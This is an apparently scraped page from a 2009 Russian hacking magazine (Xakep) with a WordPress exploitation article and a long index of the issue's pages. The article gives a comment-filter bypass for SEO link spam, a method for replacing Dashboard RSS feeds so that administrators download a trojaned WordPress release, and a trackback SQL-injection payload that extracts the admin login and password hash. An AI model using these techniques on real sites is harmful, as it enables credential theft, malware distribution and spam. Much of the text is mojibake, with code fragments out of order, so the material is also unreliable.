ÃÂ›ÃÂ£ÃÂ§ÃÂ¨ÃÂ˜ÃÂ¥ ÃÂ’ÃÂ˜ÃÂ ÃÂ£ÃÂ¡ÃÂžÃÂ’ - Xakep Online

More documents

Recommendations

Info

взлом WORDPRESS COMMENTS HTML SPAM VULNERABILITY Перед тобой первая неопубликованная уязвимость, которую я назвал «WordPress Comments Html Spam Vulnerability». Уязвимость затрагивает все версии движка, начиная от 1.5 и заканчивая последней (на момент написания статьи) 2.7.1. Заглянем в исходники вордпресса. Открывай файл ./wp-includes/ comment.php и находи следующий код: function check_comment($author, $email, $url, $comment, $user_ip, $user_agent, $comment_type) { ... if ( 'trackback' == $comment_type || 'pingback' == $comment_type ) { // check if domain is in blogroll $uri = parse_url($url); $domain = $uri['host']; $uri = parse_url( get_option('home') ); $home_domain = $uri['host']; if ( $wpdb->get_var($wpdb->prepare("SELECT link_id FROM $wpdb->links WHERE link_url LIKE (%s) LIMIT 1", '%'.$domain.'%')) || $domain == $home_domain ) return true; else return false; } ... } } $str = mb_strcut( $str, 0, $count ); // remove part of an entity at the end $str = preg_replace( '/&[^;\s]{0,6}$/’, '', $str ); return $str; Казалось бы, передать ссылку здесь невозможно. Но нерадивые разработчики снова не учли несколько нюансов: 1. strip_tags() успешно пропускает через себя теги вроде «» (то есть, содержащие пробелы); 2. kses-фильтры успешно нормализуют html-теги, содержащие в себе эти самые пробелы. Исходя из этой информации, можно придумать конечный эксплойт: Òàéòë: URL: Comment: Êóïèòü ñëîíà< / a >< / b > В итоге, на нужном блоге мы получим зааппрувленный комментарий с выделенной жирной ссылкой «Купить слона». Единственное замечание: этот способ в SEO годен только для Yahoo, Яндекса, MSN, так как в коде ссылки добавляется rel=«nofollow», благодаря чему всемогущий Гугл ее не засчитывает. ПОДМЕНА RSS-ФИДОВ В DASHBOARD В конце прошлого года я нашел еще один занимательный баг в WordPress, который заключался в подмене RSS-лент на главной странице админки блога. Итак, в Dashboard содержатся следующие ленты новостей: новости плагинов, incoming links, новости devblog c wordpress. org и новости «Планеты WordPress». Начиная с версии 2.5, к каждому фиду прикреплена кнопочка «Edit», что позволяет администратору блога редактировать эти пресловутые фиды, заменяя их на любые свои. Но разработчики снова проморгали тот факт, что в функции редактирования фидов не существует никакой проверки прав (в который раз поражаюсь невнимательности девелоперов). Теперь смотри. Скопируй ленту новостей с девблога официального сайта вордпресса, затем вставь в нее в качестве первого поста объявление о security-патче (или просто новой версии) блога. В посте (естественно, в ссылке на скачку) укажи свой протрояненный дистрибутив вордпресса. Затем положи подготовленный фид на какой-нибудь сервер и используй этот html-код для подмены рсс-ленты девблога на свою:
взлом Редактирование кукисов в Opera Генерация таблиц для admin takeover от Электа links • wordpress.org/ download/releasearchive/ — архив релизов WordPress. • milw0rm.com/ exploits/4721 — Charset Remote SQL Injection Vulnerability. • buayacorp.com/ files/wordpress/ wordpress-sqlinjection-advisory. html — Remote SQL Injection in WordPress and WordPress MU. • securityfocus. com/bid/27669 — WordPress 'xmlrpc.php' Post Edit Unauthorized Access Vulnerability. • securityfocus. com/bid/28845 — WordPress 'cat' Parameter Directory Traversal Vulnerability. Эксплойт для баги с create_function value="Çàãîëîâîê ðññ" /> query("UPDATE $wpdb->posts SET pinged = '$new' WHERE ID = $post_id"); } Небольшие раскопки дают понять, что фильтра «add_ping» не существует в коде движка. Получается, что данные из первого запроса подставляются во второй запрос без какой-либо фильтрации! А теперь о способе эксплуатации данной уязвимости. Запасись терпением :). Чтобы использовать баг, тебе необходимо две инсталляции вордпресса: 1. Все равно какой версии. Создай новый пост с любым тайтлом и содержимым: pingme Запомни адрес созданного поста (например, http://lamer/ wp1/?p=2). 2.Во втором блоге ветки 2.3.x-2.5.1 создай пост с любым содержанием и любым тайтлом, а в поле «Send trackbacks to:» пиши: test',post_title=(select/**/concat(user_ login,':',user_pass)/**/from/**/wp_users/**/ where/**/id=1),post_content_filtered =’blah 054 function add_ping($post_id, $uri) { // Add a URL to those already pung global $wpdb; $pung = $wpdb->get_var("SELECT pinged FROM Сохраняй пост. Снова заходи в его редактирование, но теперь редактируй само содержимое и вставля й туда ссылку в html-формате на пост из первого блога: XÀÊÅÐ 04 /124/ 09
Page 1:
ПОЛНЫЙ АНАЛИЗ ПРИВ
Page 4 and 5: CONTENT 04(124) Nimda 004 MEGANEWS
Page 6: meganews PC27 J3 J3 PC27 МАРИЯ
Page 10 and 11: PC27 >> meganews Аварийная
Page 13 and 14: PC27 >> meganews PANDA SECURITY С
Page 15 and 16: PC27 >> meganews Рекламная
Page 17 and 18: ferrum ИГОРЬ ФЕДЮКИН Т
Page 19 and 20: ferrum СКОРОСТЬ WI-FI (1М,
Page 21 and 22: pc_zone Code red 3 СТЕПАН И
Page 23 and 24: pc_zone CODE RED ДЕФЕЙСИЛ
Page 25 and 26: pc_zone Sony rootkit Warezov BSOD
Page 27 and 28: pc_zone СТЕПАН ИЛЬИН / S
Page 29 and 30: pc_zone links • Параметр
Page 31 and 32: pc_zone 1) Укажи свой ро
Page 33 and 34: pc_zone БАЗА ДАННЫХ 1C З
Page 35 and 36: pc_zone info • Не забыва
Page 37: pc_zone С помощью тулз
Page 40 and 41: взлом ¹4 ЗАДАЧА: ОТЛ
Page 42 and 43: взлом ftp://admin:narym7@127.0
Page 44 and 45: обзор эксплоитов о
Page 50 and 51: взлом BID OSVDB Secunia к н
Page 52 and 53: взлом BID OSVDB Secunia Выв
Page 56 and 57: взлом Parse_str sql-инъек
Page 58 and 59: взлом Редактирован
Page 60 and 61: взлом Advanced Enterprise Serv
Page 62 and 63: взлом Редактор HT Ст
Page 64 and 65: ПОДПИСКА В РЕДАКЦИ
Page 66 and 67: взлом Power in from car Power
Page 68 and 69: взлом Динамо-машин
Page 70 and 71: взлом Для отладки о
Page 72 and 73: взлом ПРОГРАММА: [XDS
Page 74 and 75: сцена уличные демо
Page 76 and 77: сцена равна стоимо
Page 78 and 79: сцена знали, что на
Page 80 and 81: Ñïîíñîðû ðóáðèêè Æ
Page 82 and 83: unixoid ПРИНЦИП РАБОТЫ
Page 84 and 85: unixoid ленных виртуал
Page 86 and 87: unixoid Карта виртуаль
Page 88 and 89: Реклама
Page 90 and 91: coding авторизации, по
Page 92 and 93: coding Питон всегда с
Page 95 and 96: ++++ >> coding ++++ ++++ ++++ ++++
Page 97 and 98: ++++ >> coding ++++ ++++ ++++ ++++
Page 99 and 100: phreaking ЕВГЕНИЙ «VSHMUK»
Page 101 and 102: pc_zone phreaking +5V Почти с
Page 103 and 104: phreaking ВАДИМ ДАНЬШИН
Page 105 and 106:
pc_zone phreaking 104 КАКИЕ В
Page 107 and 108:
SYN/ACK СЕРГЕЙ «GRINDER» Я
Page 109 and 110:
SYN/ACK Компонент BitLocke
Page 111 and 112:
SYN/ACK ЕВГЕНИЙ «J1M» ЗО
Page 113 and 114:
SYN/ACK info • Чтобы нау
Page 115 and 116:
ХАКЕР.PRO SYN/ACK Ïàðà ñ
Page 117 and 118:
SYN/ACK Channel: SIP/admin Callerid
Page 119 and 120:
ХАКЕР.PRO SYN/ACK Список
Page 121 and 122:
units АЛЕКСАНДР ЛОЗОВ
Page 123 and 124:
units Игра в компьюте
Page 125 and 126:
units МАГ / ICQ 884888 / FAQ UNI
Page 127 and 128:
units [ABCDEFGHIJKLMNOPQRSTUVWXYZ01
Page 129:
http:// WWW2 ДЛЯ СЪЕМКИ С
show all

ÃÂ›ÃÂ£ÃÂ§ÃÂ¨ÃÂ˜ÃÂ¥ ÃÂ’ÃÂ˜ÃÂ ÃÂ£ÃÂ¡ÃÂžÃÂ’ - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

ÃÂ›ÃÂ£ÃÂ§ÃÂ¨ÃÂ˜ÃÂ¥ ÃÂ’ÃÂ˜ÃÂ ÃÂ£ÃÂ¡ÃÂžÃÂ’ - Xakep Online